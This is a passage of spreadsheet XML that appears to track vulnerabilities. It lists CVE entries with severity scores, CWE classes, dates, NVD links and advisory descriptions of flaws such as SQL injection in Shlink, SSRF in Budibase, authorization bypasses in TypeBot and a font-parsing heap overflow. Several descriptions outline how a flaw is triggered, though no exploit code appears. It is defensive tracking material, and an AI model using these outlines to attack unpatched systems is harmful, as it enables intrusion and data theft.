      <c r="I3094" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3094" s="5" t="inlineStr"/>
      <c r="K3094" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3094" s="5" t="inlineStr">
        <is>
          <t>A heap-buffer-overflow vulnerability exists in the nothings stb TrueType library, up to version 1.26, that is used for parsing TrueType font files. The vulnerability exists in the stbtt__GetGlyphShapeTT() function within the nothings stb_truetype.h library when parsing malformed TTF (TrueType Font) files. The vulnerability resides in the glyph data parsing path.
An attacker can craft a malformed TTF file with an inflated endPtsOfContours value and truncate the remaining glyph data. When an application utilizing stb_truetype.h (such as various game engines or graphics software) attempts to load, bake, or render this malformed font via stbtt_GetGlyphShape(), the parser will attempt to read past the end of the glyph data buffer, triggering the out-of-bounds read.</t>
        </is>
      </c>
      <c r="M3094" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18497</t>
        </is>
      </c>
    </row>
    <row r="3095">
      <c r="A3095" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3095" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18620</t>
        </is>
      </c>
      <c r="C3095" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3095" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3095" s="5" t="inlineStr"/>
      <c r="F3095" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3095" s="5" t="inlineStr"/>
      <c r="H3095" s="5" t="inlineStr"/>
      <c r="I3095" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3095" s="5" t="inlineStr"/>
      <c r="K3095" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3095" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Data Science Pipelines. A restricted user, or tenant, can exploit an improper authorization vulnerability in the setDefaultServiceAccount function. By specifying a more privileged ServiceAccount (SA) during a CreateRun request, an attacker can bypass authorization checks. This allows the tenant to run their containers with elevated privileges, potentially leading to the disclosure of sensitive information (secrets) and the ability to execute commands within other users' pods.</t>
        </is>
      </c>
      <c r="M3095" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18620</t>
        </is>
      </c>
    </row>
    <row r="3096">
      <c r="A3096" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3096" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18737</t>
        </is>
      </c>
      <c r="C3096" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3096" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3096" s="5" t="inlineStr"/>
      <c r="F3096" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3096" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H3096" s="5" t="inlineStr"/>
      <c r="I3096" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J3096" s="5" t="inlineStr"/>
      <c r="K3096" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3096" s="5" t="inlineStr">
        <is>
          <t>Shlink contains a blind SQL injection vulnerability that allows any authenticated API key holder to inject arbitrary SQL fragments by supplying an unvalidated direction value in the orderBy query parameter of the tag statistics endpoint. Attackers can craft a malicious direction string containing SQL subqueries that flows unsanitized into a Doctrine QueryBuilder ORDER BY clause, enabling time-based, boolean-oracle, and error-based extraction of sensitive data including long URLs, visitor records, IP addresses, geolocation data, user agents, and hashed API key secrets from any tenant.</t>
        </is>
      </c>
      <c r="M3096" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18737</t>
        </is>
      </c>
    </row>
    <row r="3097">
      <c r="A3097" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3097" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19051</t>
        </is>
      </c>
      <c r="C3097" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3097" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3097" s="5" t="inlineStr"/>
      <c r="F3097" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3097" s="5" t="inlineStr"/>
      <c r="H3097" s="5" t="inlineStr"/>
      <c r="I3097" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3097" s="5" t="inlineStr"/>
      <c r="K3097" s="5" t="inlineStr">
        <is>
          <t>CWE-256</t>
        </is>
      </c>
      <c r="L3097" s="5" t="inlineStr">
        <is>
          <t>Plaintext storage of a password vulnerability in Menulux Software Inc. Menulux Portal allows Retrieve Embedded Sensitive Data.
This issue affects Menulux Portal: before 20260903211448.</t>
        </is>
      </c>
      <c r="M3097" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19051</t>
        </is>
      </c>
    </row>
    <row r="3098">
      <c r="A3098" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3098" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19671</t>
        </is>
      </c>
      <c r="C3098" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3098" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3098" s="5" t="inlineStr"/>
      <c r="F3098" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3098" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H3098" s="5" t="inlineStr"/>
      <c r="I3098" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3098" s="5" t="inlineStr"/>
      <c r="K3098" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L3098" s="5" t="inlineStr">
        <is>
          <t>Malcolm's upload-processing pipeline (scripts/safe-extract.py) enforces entry-count, nesting-depth, and total-uncompressed-byte limits when extracting container archives (zip/tar/rar/7z via libarchive), but those limits are not applied when the uploaded file is a single-stream compressed format (.gz, .bz2, .xz, .lzma, .lz) that isn't a .tar.*-style archive. Any authenticated user permitted to upload PCAP/log files can upload a small, highly compressible file (e.g. a gzip bomb) that decompresses to an effectively unbounded size on disk, exhausting the shared Docker volume used by OpenSearch, Logstash, Arkime, and Zeek, and disrupting the platform for all users.</t>
        </is>
      </c>
      <c r="M3098" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19671</t>
        </is>
      </c>
    </row>
    <row r="3099">
      <c r="A3099" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3099" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20293</t>
        </is>
      </c>
      <c r="C3099" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3099" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3099" s="5" t="inlineStr"/>
      <c r="F3099" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3099" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="H3099" s="5" t="inlineStr"/>
      <c r="I3099" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3099" s="5" t="inlineStr"/>
      <c r="K3099" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="L3099" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M3099" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20293</t>
        </is>
      </c>
    </row>
    <row r="3100">
      <c r="A3100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21104</t>
        </is>
      </c>
      <c r="C3100" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3100" s="5" t="inlineStr"/>
      <c r="F3100" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3100" s="5" t="inlineStr"/>
      <c r="H3100" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="I3100" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3100" s="5" t="inlineStr"/>
      <c r="K3100" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3100" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in KnoxVault trustlet prior to SMR Sep-2026 Release 1 allows local privileged attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="M3100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21104</t>
        </is>
      </c>
    </row>
    <row r="3101">
      <c r="A3101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23940</t>
        </is>
      </c>
      <c r="C3101" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3101" s="5" t="inlineStr"/>
      <c r="F3101" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3101" s="5" t="inlineStr"/>
      <c r="H3101" s="5" t="inlineStr">
        <is>
          <t>hex:hexpm</t>
        </is>
      </c>
      <c r="I3101" s="5" t="inlineStr">
        <is>
          <t>2026-03-13</t>
        </is>
      </c>
      <c r="J3101" s="5" t="inlineStr"/>
      <c r="K3101" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3101" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled Resource Consumption vulnerability in hexpm hexpm/hexpm allows Excessive Allocation.
Publishing an oversized package can cause Hex.pm to run out of memory while extracting the uploaded package tarball. This can terminate the affected application instance and result in a denial of service for package publishing and potentially other package-processing functionality.
This issue affects hex.pm: before 2026-03-10.</t>
        </is>
      </c>
      <c r="M3101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23940</t>
        </is>
      </c>
    </row>
    <row r="3102">
      <c r="A3102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30865</t>
        </is>
      </c>
      <c r="C3102" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3102" s="5" t="inlineStr"/>
      <c r="F3102" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3102" s="5" t="inlineStr"/>
      <c r="H3102" s="5" t="inlineStr"/>
      <c r="I3102" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J3102" s="5" t="inlineStr"/>
      <c r="K3102" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3102" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in the dashboard save functionality. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M3102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30865</t>
        </is>
      </c>
    </row>
    <row r="3103">
      <c r="A3103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35219</t>
        </is>
      </c>
      <c r="C3103" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3103" s="5" t="inlineStr"/>
      <c r="F3103" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3103" s="5" t="inlineStr"/>
      <c r="H3103" s="5" t="inlineStr"/>
      <c r="I3103" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3103" s="5" t="inlineStr"/>
      <c r="K3103" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3103" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.41.3, automation steps in packages/server/src/automations/steps/outgoingWebhook.ts, packages/server/src/automations/steps/zapier.ts, packages/server/src/automations/steps/n8n.ts, packages/server/src/automations/steps/slack.ts, and packages/server/src/automations/steps/discord.ts use node-fetch on user-provided URLs without the BLACKLIST_IPS enforcement used by the REST integration, allowing an authenticated user to make server-side requests to cloud metadata and internal services. This issue is fixed in version 3.41.3.</t>
        </is>
      </c>
      <c r="M3103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35219</t>
        </is>
      </c>
    </row>
    <row r="3104">
      <c r="A3104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35445</t>
        </is>
      </c>
      <c r="C3104" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3104" s="5" t="inlineStr"/>
      <c r="F3104" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3104" s="5" t="inlineStr"/>
      <c r="H3104" s="5" t="inlineStr"/>
      <c r="I3104" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J3104" s="5" t="inlineStr"/>
      <c r="K3104" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L3104" s="5" t="inlineStr">
        <is>
          <t>Winter CMS is a content management system built on the Laravel PHP framework. In versions prior to 1.2.13, the backend did not validate the handler name submitted through the form postback _handler POST field, allowing an authenticated backend user to invoke arbitrary controller methods, including protected, private, and action-prefixed ones. While AJAX requests validate that handler names match the on[A-Z][\w+]* pattern, the postback path passed the submitted _handler value straight to the handler dispatcher with no such check, so any controller that exposes a public action or conditionally relaxes its $requiredPermissions check could be reached, bypassing the roles and permissions system. The built-in Users controller was affected because it set $requiredPermissions to null for the myaccount action, letting any authenticated backend user invoke user-management methods such as update_onDelete and update_onManualPasswordReset without holding the backend.manage_users permission. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="M3104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35445</t>
        </is>
      </c>
    </row>
    <row r="3105">
      <c r="A3105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38821</t>
        </is>
      </c>
      <c r="C3105" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3105" s="5" t="inlineStr"/>
      <c r="F3105" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3105" s="5" t="inlineStr"/>
      <c r="H3105" s="5" t="inlineStr"/>
      <c r="I3105" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3105" s="5" t="inlineStr"/>
      <c r="K3105" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3105" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow vulnerability exists in openNDS before 11.0.0 that allows an unauthenticated attacker on the captive portal network to crash the openNDS daemon (denial of service) and potentially achieve remote code execution. This is in http_microhttpd.c.</t>
        </is>
      </c>
      <c r="M3105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38821</t>
        </is>
      </c>
    </row>
    <row r="3106">
      <c r="A3106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42142</t>
        </is>
      </c>
      <c r="C3106" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3106" s="5" t="inlineStr"/>
      <c r="F3106" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3106" s="5" t="inlineStr"/>
      <c r="H3106" s="5" t="inlineStr"/>
      <c r="I3106" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3106" s="5" t="inlineStr"/>
      <c r="K3106" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3106" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Prior to version 3.17.0, the `handleGetSheets` API handler (`POST /api/sheets/getSheets`) does not validate workspace membership, allowing any authenticated user to access and decrypt another workspace's Google Sheets OAuth credentials and retrieve spreadsheet data (sheet names, IDs, column headers). Version 3.17.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M3106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42142</t>
        </is>
      </c>
    </row>
    <row r="3107">
      <c r="A3107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45808</t>
        </is>
      </c>
      <c r="C3107" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3107" s="5" t="inlineStr"/>
      <c r="F3107" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3107" s="5" t="inlineStr"/>
      <c r="H3107" s="5" t="inlineStr"/>
      <c r="I3107" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3107" s="5" t="inlineStr"/>
      <c r="K3107" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3107" s="5" t="inlineStr">
        <is>
          <t>OpenBao is an open source identity-based secrets management system. Prior to version 2.5.4, OpenBao's namespaces provide multi-tenant separation. A tenant who intentionally leaks lease identifiers can have their lease and underlying credential revoked or renewed by a user in another tenant via the legacy, undocumented `sys/revoke` and `sys/renew` endpoints. This is fixed in OpenBao v2.5.4.</t>
        </is>
      </c>
      <c r="M3107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45808</t>
        </is>
      </c>
    </row>
    <row r="3108">
      <c r="A3108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47682</t>
        </is>
      </c>
      <c r="C3108" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3108" s="5" t="inlineStr"/>
      <c r="F3108" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3108" s="5" t="inlineStr"/>
      <c r="H3108" s="5" t="inlineStr"/>
      <c r="I3108" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3108" s="5" t="inlineStr"/>
      <c r="K3108" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3108" s="5" t="inlineStr">
        <is>
          <t>CVAT is an open source interactive video and image annotation tool for computer vision. In versions 1.6.0 through 2.64.0, an attacker with write access to a cloud storage that's been added to a CVAT instance, or ability to add new cloud storages, is able to overwrite arbitrary files on the server's filesystem. This issue has been fixed in version 2.65.0.</t>
        </is>
      </c>
      <c r="M3108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47682</t>
        </is>
      </c>
    </row>
    <row r="3109">
      <c r="A3109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47704</t>
        </is>
      </c>
      <c r="C3109" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3109" s="5" t="inlineStr"/>
      <c r="F3109" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3109" s="5" t="inlineStr"/>
      <c r="H3109" s="5" t="inlineStr"/>
      <c r="I3109" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3109" s="5" t="inlineStr"/>
      <c r="K3109" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3109" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Prior to version 3.17.0, an authenticated user who has read access to any typebot can resume a waiting webhook session that belongs to a different typebot by mixing an authorized `typebotId` and `blockId` and a foreign live `resultId`. The webhook resume handler authorizes the parent typebot first, but then resolves the descendant `result` only by `resultId`. As a result, an attacker can inject arbitrary webhook JSON into another typebot's suspended session and advance its execution without any access to the victim typebot. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
      <c r="M3109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47704</t>
        </is>
      </c>
    </row>
    <row r="3110">
      <c r="A3110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47735</t>
        </is>
      </c>
      <c r="C3110" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3110" s="5" t="inlineStr"/>
      <c r="F3110" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3110" s="5" t="inlineStr"/>
      <c r="H3110" s="5" t="inlineStr"/>
      <c r="I3110" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J3110" s="5" t="inlineStr"/>
      <c r="K3110" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-22, CWE-918</t>
        </is>
      </c>
      <c r="L3110" s="5" t="inlineStr">
        <is>
          <t>Arc is an open, SQL-native time-series database for telemetry. Prior to version 26.06.1, Arc's user-SQL validator (`internal/api/query.go:ValidateSQLRequest`) blocked only `read_parquet(` and `arc_partition_agg(` via regex denylist. The broader DuckDB I/O function family — `read_csv_auto`, `read_csv`, `read_json`, `read_json_auto`, `read_text`, `read_blob`, `glob`, `parquet_metadata`, `parquet_schema`, `read_xlsx`, etc. — was not blocked. RBAC table-reference extraction inspected only `FROM`/`JOIN` clauses, so scalar table functions in the `SELECT` list slipped past both layers. This is fixed in 2026.06.1 via a structural sandbox at the DuckDB layer. After lockdown, DuckDB refuses to open any file outside the allowlist and refuses further `INSTALL`/`LOAD`. Already-loaded extensions remain callable. Some workarounds are available. Restrict API access to known-trusted networks via firewall rules or, as a temporary mitigation, add `read_csv*`/`read_json*`/`glob` etc. to `dangerousSQLPattern` in `internal/api/query.go`.</t>
        </is>
      </c>
      <c r="M3110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47735</t>
        </is>
      </c>
    </row>
    <row r="3111">
      <c r="A3111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47765</t>
        </is>
      </c>
      <c r="C3111" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3111" s="5" t="inlineStr"/>
      <c r="F3111" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3111" s="5" t="inlineStr"/>
      <c r="H3111" s="5" t="inlineStr"/>
      <c r="I3111" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J3111" s="5" t="inlineStr"/>
      <c r="K3111" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3111" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework. Prior to 15.110.0 and 16.20.0, the restore and bulk_restore endpoints do not apply the appropriate document permission checks, allowing an authenticated user to restore deleted documents without the required authorization. This issue is fixed in versions 15.110.0 and 16.20.0.</t>
        </is>
      </c>
      <c r="M3111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47765</t>
        </is>
      </c>
    </row>
    <row r="3112">
      <c r="A3112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48099</t>
        </is>
      </c>
      <c r="C3112" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3112" s="5" t="inlineStr"/>
      <c r="F3112" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3112" s="5" t="inlineStr"/>
      <c r="H3112" s="5" t="inlineStr"/>
      <c r="I3112" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3112" s="5" t="inlineStr"/>
      <c r="K3112" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3112" s="5" t="inlineStr">
        <is>
          <t>WsgiDAV is a generic and extendable WebDAV server based on WSGI. WsgiDAV 4.3.3 and prior can allow a WebDAV request path containing an encoded parent-directory segment to escape the configured filesystem share root in a specific path layout. The issue is fixed with version 4.3.4.</t>
        </is>
      </c>
      <c r="M3112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48099</t>
        </is>
      </c>
    </row>
    <row r="3113">
      <c r="A3113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48494</t>
        </is>
      </c>
      <c r="C3113" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3113" s="5" t="inlineStr"/>
      <c r="F3113" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3113" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H3113" s="5" t="inlineStr"/>
      <c r="I3113" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3113" s="5" t="inlineStr"/>
      <c r="K3113" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3113" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. In version 3.16.1, an authenticated user who has read access to any typebot can resume a WhatsApp preview webhook session that belongs to a different typebot by mixing an authorized `typebotId` and `blockId` and a foreign preview phone number tied to another preview session. The WhatsApp test-webhook handler authorizes the parent typebot first, but then resolves the preview chat session only by `wa-preview-{phone}`. As a result, an attacker can inject arbitrary webhook JSON into another workspace's WhatsApp preview session and advance its draft/unpublished flow without any access to the victim typebot. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
      <c r="M3113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48494</t>
        </is>
      </c>
    </row>
    <row r="3114">
      <c r="A3114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48495</t>
        </is>
      </c>
      <c r="C3114" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3114" s="5" t="inlineStr"/>
      <c r="F3114" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3114" s="5" t="inlineStr"/>
      <c r="H3114" s="5" t="inlineStr"/>
      <c r="I3114" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3114" s="5" t="inlineStr"/>
      <c r="K3114" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3114" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Prior to version 3.17.0, the Google Sheets OAuth callback decodes a base64-encoded JSON `state` parameter and trusts the embedded `workspaceId`, `typebotId`, `blockId`, and `redirectUrl` without cryptographic integrity protection or authorization checks. The callback route is authenticated, but it does not verify that the authenticated user has write access to the target workspace or Typebot before creating credentials in the workspace or updating Typebot groups. An authenticated user who can obtain a valid Google OAuth `code` can alter the `state` value to create Google Sheets credentials in another workspace and, if target IDs are known, attach those credentials to a block in another Typebot. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
